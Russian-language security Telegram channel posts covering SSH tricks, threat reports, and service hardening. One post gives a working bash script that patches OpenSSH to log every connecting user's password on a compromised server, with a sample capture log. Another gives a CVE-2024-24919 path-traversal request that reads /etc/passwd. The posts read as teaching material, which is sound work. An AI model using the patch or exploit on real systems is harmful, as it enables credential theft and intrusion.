💥 Всем привет. На связи @pyfffe

Немного разбавлю череду статей своим небольшим постом
Представляю вашему вниманию самый простой лабораторный стенд на переполнение буфера. В лабе описано, как поднять и настроить виртуальную машину с уязвимым приложением для повышения привилегий и гайдом, как это всё эксплуатировать. Проще наверное можно сделать только развёртование, но это как-нибудь в другой раз 😁

Ссылка на лабу: 🔗 Тык

#cybersecurity #REDtalk #stackoverflaw #кибербезопасность #ИБ

Небывалая толщина этого отчета защищала его от опасности быть прочитанным....😁
©Уинстон Черчилль

Приветствую Вас, дорогие друзья!👋🏻
На связи @dolgihser

Ну что ж, отпуск пролетел незаметно, а значит, что пора потихоньку возвращаться в дело✌🏻
Сегодня небольшой пост от меня про отчеты и статистику)

Традиционно март-апрель - это месяцы, когда наши ведущие игроки на рынке кибербезопасности подводят итоги работ за прошлый год и предоставляют свои аналитические отчеты. Не стал исключением и этот апрель. Результаты своих работ представили на изучение BI.ZONE и Kaspersky.

Коллеги из BI.ZONE представили объемный отчет-исследование российского ландшафта киберугроз с подробным описанием группировок, инструментов, порядка атаки и множеством другой полезной информации, агрегированной за 2023 год. К слову, это отличный источник для написания и улучшения сценариев обнаружения и реагирования, который мы с командой взяли в работу и сейчас активно прорабатываем для собственного применения.🔥

Отчеты Kaspersky получились менее объемными, тем не менее наполнены множеством статистической информации по направлениям Incident Response и Managed Detection and Response, также весьма полезной для ознакомления.🔥

Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.

С любовью к отчетам,
Ваш @dolgihser😊

#SOC #pentest #security #hacking #ИБ #blueteam #cybersecurity #redteam #purpleteam #кибербезопасность #REDtalk

Привет 💥 На связи @pyfffe

Хочу осветить такой язык разметки текста, как Markdown.

Markdown (сокращенно MD) - это язык разметки, стремящийся упростить форматирование текста с сохранением читабельности без исходников. При этом он имеет достаточно богатый и расширяемый функционал с возможностью перевода в другую разметку на случай необходимости. И в отличие всяких html и xml, в MD отсутствуют теги.

Вот пример разметки:

## 📅 **Задачи на сегодня**

- [x] Закончить отчет по проекту "Маркетинговая стратегия"
- [x] Подготовить презентацию для совещания
- [ ] Отправить приглашения на встречу с клиентом

## 📊 **Статистика по продажам:**

| Товар        | Продано, штук | Выручка, $ |
|--------------|---------------|------------|
| Монитор      | 20            | 500        |
| Клавиатура   | 35            | 700        |
| Мышь         | 30            | 300        |
| Наушники     | 15            | 450        |

Можно видеть, что сам код уже выглядит как красиво отредактированный текст.

Но это не всё. Можно также зайти на https://markdownlivepreview.com/ и посмотреть на это в обработанном виде.

Кто-то считает Markdown каким-то новомодным инструментом. При том, что его первый релиз состоялся еще в далёком 2004 гому и на сегодняшний день ему уже 20 лет. 🤷‍♂️

Из популярных примеров можно выделить его интеграцию в Github (Тот самый README.md), платформу notion, hackmd, medium, электронная книга HackTricks и много чего еще. Лично я предпочитаю писать заметки и посты на MD как раз из-за его простоты и некой аутентичности формата. ✨

#REDtalk #Markdown

Привет, друзья! 🌟 Сегодня я расскажу про SSH. Думаю, многим из вас уже известно, что это. Но для тех, кто по какой-то причине не знаком с ним, SSH - это сетевой протокол прикладного уровня, который позволяет осуществлять удаленное управление серверами. 💻 На практике мы очень часто используем его. Сегодня я собрал для вас несколько интересных команд, которые могут быть полезны в вашей работе. 🛠️

1. Удаленное выполнение команд:

ssh user@remotehost ваша_команда

# Цепочки команд на удаленном хосте
ssh user@remotehost "ваша_команда_1 | ваша_команда_2 | ваша_команда_3"

2. Копирование файлов:

# Загрузка на удаленный сервер
scp имя_файла user@remote_ip_addr:/удаленная_директория

# Скачивание с удаленного сервера
scp user@remote_ip_addr:/удаленная_директория/имя_файла /локальная_директория/имя_файла

3. Монтирование удаленных директорий:

Для этого используем SSHFS:

sshfs remotehost:/ ~/local_dir

4. Pivoting через SSH:

Представим, что мы взломали сервер и на нем есть приложение, которое запущено на порту, к которому нет доступа снаружи, но есть доступ с сервера.

Команда:

ssh -L 6512:localhost:5678 root@serverIP

После этого мы можем использовать приложение напрямую, как будто оно было запущено локально.

Также можно открывать доступ не к локальному порту сервера, а к удаленному порту другой машины, доступной с сервера, используя ключ N, тем самым выстраивая цепочки из ssh-тунелей:

ssh -L 6512:remote_server2:8080 user@remote_server1 -N

# Цепочка
ssh -L 6512:localhost:6512 user@remote_server1 ssh -L 6512:localhost:2375 -N user2@remote_server2

Можно создать защищенную цепочку SSH-тунелей, где трафик второго сервера не будет виден на первом сервере:

ssh -L 6513:server2:22 -N root@server1 ssh -L 6512:localhost:2375 -N -p 6513 root@localhost

5. Reverse SSH:

На нашем сервере:

ssh -R port:localhost:22 remotehost

# Например:
ssh -R 2256:localhost:22 remotehost

На целевой машине:

ssh localhost -p 2256

Ключ R работает по такому же принципу, как и ключ L, но подключение идет к нашей машине.

#ToolTricks #pentest

💥 Привет, В дополнение к предыдущему посту хочу показать еще одну интересную “фишку” ssh

Представим ситуацию, что в процессе редтима мы получили доступ к линуксовому серверу и повысились до рута, что привело к его полной компрометации. Что делать дальше? Как продвигаться по сети?

На мой взгляд, первое, что нужно сделать после закрепления, это внедрить все возможные логгеры и прослушки пользовательского ввода.

Тут как раз приходит на помощь ssh. С его помощью можно спокойно перехватить учётные данные любого подключающегося пользователя. Но для этого нужно пропатчить и перекомпилировать openssh. Вот небольшой bash скрипт для патчинга и компиляции

# 
# Не стоит его выполнять просто Ctrl+C Ctrl+V, и уж тем более не на какой-то важной машине 😁
#

# Устанавливаем зависимости
sudo apt update
sudo apt install libpam-dev libssl-dev build-essential autoconf

# Скачиваем исходники
cd /tmp
git clone https://github.com/openssh/openssh-portable
cd openssh-portable

# Патчим
sed -e 's/^\([ \t]*\)\(struct passwd \*pw = authctxt->pw;\)/\1logit("Login attempt by username '\''%s'\'', password '\''%s'\''", authctxt->user, password);\n\1\2/' -i auth-passwd.c

# Компилируем
autoreconf
./configure --with-pam
make

# Изменяем /etc/ssh/sshd_config
cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sed -e 's/^#[ ]*HostKey/HostKey/' -i /etc/ssh/sshd_config

# Заменяем ssh-сервер
sudo systemctl stop ssh
sudo mkdir /usr/local/libexec
sudo cp sshd-session /usr/local/libexec
/tmp/sshd/sshd -D -f /etc/ssh/sshd_config

И как результат, администратор, не зная, что машина скомпрометирована, подключается к нашему поддельному ssh-серверу и спокойно вводит учётные данные

2024-05-22T18:22:48.465415+03:00 ubuntu sshd[287253]: Server listening on 0.0.0.0 port 22.
2024-05-22T18:22:48.465515+03:00 ubuntu sshd[287253]: Server listening on :: port 22.
2024-05-22T18:23:05.369739+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd'
2024-05-22T18:23:05.400492+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:auth): authentication failure; logname=ubuntu uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1  user=admin
2024-05-22T18:23:07.070018+03:00 ubuntu sshd-session[287271]: Failed password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.858256+03:00 ubuntu sshd-session[287271]: Login attempt by username 'admin', password 'Sup3rStr0ngAdm1nP@ssw0rd1337'
2024-05-22T18:23:09.893910+03:00 kaubuntu i sshd-session[287271]: Accepted password for admin from 127.0.0.1 port 35226 ssh2
2024-05-22T18:23:09.894635+03:00 ubuntu sshd-session[287271]: pam_unix(sshd-session:session): session opened for user admin(uid=1000) by admin(uid=0)
2024-05-22T18:23:11.862494+03:00 ubuntu  sshd-session[287427]: Received disconnect from 127.0.0.1 port 35226:11: disconnected by user
2024-05-22T18:23:11.862963+03:00 ubuntu sshd-session[287427]: Disconnected from user admin 127.0.0.1 port 35226

Стоит упомянуть, что существует проверка сигнатуры ключа при повторных подключениях, и если открытые ключи не совпадают, то ssh-клиент не выполняет аутентификацию с грозным сообщением WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!

А упомянуть это стоит для того, что при подключении к поддельному сообщению никакой ошибки не будет, так как ключи на поддельном сервер используются те же, что и раньше 😈

Приветствую Вас, дорогие друзья!👋🏻

В крайнем своем посте делился с Вами аналитическими отчетами. Коллеги из Kaspersky, как Вы помните, поделились с нами аналитикой по направлениям Incident Response и Managed Detection and Response. И вот на этой неделе они представили на изучение свой отчет-исследование российского ландшафта киберугроз, по аналогии с ранее подготовленным от BI.ZONE. В нем всё, как мы любим: тактики, техники и процедуры злоумышленников (TTPs), применяемое ВПО и т.д. Мы с командой уже взяли его в работу. 🔥

Думаю, что в следующих постах наложу друг на друга наши результаты по обработке материалов от BI.ZONE и Kaspersky и поделюсь с Вами тем, какую практическую пользу мы с командой из них извлекли. Во всяком случае на основе информации от BI.ZONE уже активно разрабатываем правила корреляции и проверяем их с моими "красными" коллегами. 🧑🏻‍💻


Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.

#REDtalk #blueteam

Привет, друзья! Сегодня у нас на повестке дня CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), причем с привилегиями root. Уязвимыми являются следующие продукты:

- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances

- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20

POC

POST /clients/MyCRL HTTP/1.1 
Host: target_host 
Content-Length: 63 
 
aCSHELL/../../../../../../../etc/passwd

Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336

#cve

💥Привет. хочу поговорить на такую тему:

Допустим, мы - крутая команда пентестеров и редтимиров, и у нас в арсенале есть важный хакерский сервис WebMap и три проблемы: сервис торчит наружу, работает по протоколу http и не требует аутентификации. Вопрос, как сделать так, чтобы нас всех не уволили, добавить шифрование, аутентификацию и при этом оставить возможность подключаться из интернета?

Вот несколько вариантов решения:

1️⃣ VPN - 3 заглавных буквы, а сколько смысла. Ставим Wireguard, генерируем конфиги, проверяем, что порт больше не открыт из вне и радуемся. Теперь только те, у кого есть доступ к “внутренней сети”, могут получить доступ.

Теперь минус - это относительная сложность. Генерировать и управлять конфигами, маршрутами, пробросами портов не то чтобы очень сложно, но и не просто. Для скрытия сети это подойдёт идеально, но для одного сервиса есть способы более элегантные.

2️⃣ Proxy - Золотая середина. Можно просто оборачивать весь http трафик в ssl через nginx-прокси в докер контейнере, да еще и добавить базовую http аутентификацию. Это всё можно сделать на том же сервере, только не забыть убрать порт из публичного доступа.

    # HTTPS сервер
    server {
        listen 443 ssl;
        server_name example.com;
    
        # Пути к сертификатам
        ssl_certificate /etc/nginx/certs/fullchain.pem;
        ssl_certificate_key /etc/nginx/certs/privkey.pem;
    
        # Настройки HTTPS
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_prefer_server_ciphers on;
        ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
    
        # Логика обработки запросов
        location / {
            proxy_pass http://127.0.0.1:80;
    
            # HTTP Basic Auth
            auth_basic "Restricted Content";
            auth_basic_user_file /etc/nginx/.htpasswd;
        }
    }
    

Запрет на прямой доступ из интернета через iptables

    iptables -A INPUT -p tcp --dport 80 -s 127.0.0.1 -j ACCEPT
    iptables -A INPUT -p tcp --dport 80 -j DROP

Но и тут есть несколько камней: Трафик проходит через прокси, а значит запрос будет видоизменяться. Например, у меня была ситуация, когда мне нужно было загрузить файл (не скан nmap 😁) на сервер, а он брал и говорил ошибку 413 Payload Too Large. Проблема была в максимальном размере запроса, передаваемом в Nginx. Фиксилось это легко, строчкой client_max_body_size 0; в вышеуказанном конфиге Nginx. Также любой для нашего проксируемого приложения любой адрес запроса будет 127.0.0.1, так как он также проходит через прокси. Это тоже фиксится строчкой в конфиге, но неприятен сам факт изменения заголовков. Есть еще самоподписываемые сертификаты, но это так, чтобы держать в голове.

3️⃣ SSH-Tunneling: Уже второй раз ссылаюсь на наш пост про SSH. Моё любимое из трех перечисленных, так как тут всё максимально просто - создаём учётку, исключаем порт из публичного доступа и подключаемся к серверу по SSH с флагом -L 80:127.0.0.1:80. Таким образом убиваем трёх зайцев - Весь трафик передается в шифрованном виде через туннель SSH, аутентификация прилагается, да еще и сам порт будет полностью невидимым для внешней сети. Можно отключить ICMP, изменить порт 22 на какой-нибудь 13372 и быть практически невидимым. Для ботов уж точно

Недостатков я тут вообще не вижу, разве что “неконтролируемый” доступ, так как при подключении по ssh, клиент, очевидно, помимо туннеля к нашему сервису, имеет SSH сессию. Но думаю, это можно пофиксить

Была у меня ситуация, когда для стандартного сценария социалки, при разворачивании GoPhish через 5 секунд адрес моего сервера в Google Chrome был помечен как самый опасный в мире и перед его посещением было буквально окно с красным фоном и предупреждением на весь экран. Оказалось, что это всё из-за торчащей наружу админки GoPhish, которую обнаружил бот гугла. Я просто сменил белый адрес и закрыл доступ к админке через ssh-туннель, и всё стало отлично.

Вот как-то так. Мы используем все три способа, в зависимости от ситуации. Может это и кажется смешным, но я и правда встретился с ситуацией, в которой один популярный хостинг, не буду показывать пальцем, имеет возможность по клику предустанавливать на ваш VPS wg-easy, которая имеет веб-интерфейс для генерации пользователей в Wireguard. Вот только этот веб-сервис (работающий в контейнере) не шифрует трафик и довольные обладатели собственного VPN качают сгенерированные конфиги через весь интернет прямо по http. Тут как раз очень пригодился бы прокси.

#redteam #ToolTricks

Дамы и господа, всех приветствую!🫶🏻

В нашей команде авторов небольшое пополнение - меня зовут Комаров Герман (@gkomarov23) и я тружусь во славу синих в команде @dolgihser

Несколько фактов о себе:

1️⃣ Самоучка

2️⃣ Получаю огромное удовольствие от обучения коллег первой линии

3️⃣ Сталкивался с работой apt-группировок

Перед собой ставлю задачу рассказать простым языком об интересных и актуальных техниках, которыми пользуются злоумышленники, и если по какой-либо из озвученных мной тем будет повышенный интерес, мы с командой красных составим более детальный технический разбор с демонстрацией инструментов, которые мы использовали, а также методами и способами защиты.

Будет интересно👌🏻

#REDtalk #blueteam

У меня к вам такой вопрос:

Используете ли вы свой личный ноутбук или компьютер для работы с корпоративными документами, проектами? Подключаетесь ли к корпоративной сети, с личных устройств? (Если да, ставь сходу 👾)
Казалось бы, что тут может быть такого, но..

Если посмотреть на это с точки зрения информационной безопасности вы являетесь так называемой "точкой входа" в корпоративную сеть.
У вас может стоять антивирус💉, вы можете знать, что такое цифровая гигиена, но вы - потенциально "самое слабое звено" во всей цепи которую кропотливо выстраивают сотрудники ИБ, и вот почему:

1. На ваше устройство не применяются групповые политики, которые существуют в организации (подключение к мониторингу🛡, где живые люди, будут на страже вашего устройства в режиме 24\7, а также всеми любимая регулярная смена пароля ну и т.п.)

2. Мало кто занимается разграничением прав у себя на устройстве, как правило у вашей УЗ права администратора😎 (что не очень хорошо)

3. Вы вольны скачивать что угодно и откуда угодно, это же ведь ваш компьютер💻

При попадании на хост злоумышленник собирает информацию о том, где он оказался, и, когда поймет, что это устройство сотрудника крупной организации, в ход могут пойти разные сценарии, от загрузки стиллеров🦠 до продажи доступа к вашему устройству в даркнете и тогда могут прийти ребята посерьезней🥷.

Мой посыл достаточно прост: не смешивайте работу и личное (и я не только про ваши устройства), проверяйте, что вы загружаете и откуда, и берегите свои данные

Если понравился пост, поддержите 👍 и тогда дальше я расскажу о тех вирусах, с которыми вы можете столкнуться, загружая все подряд из интернета
#REDtalk #blueteam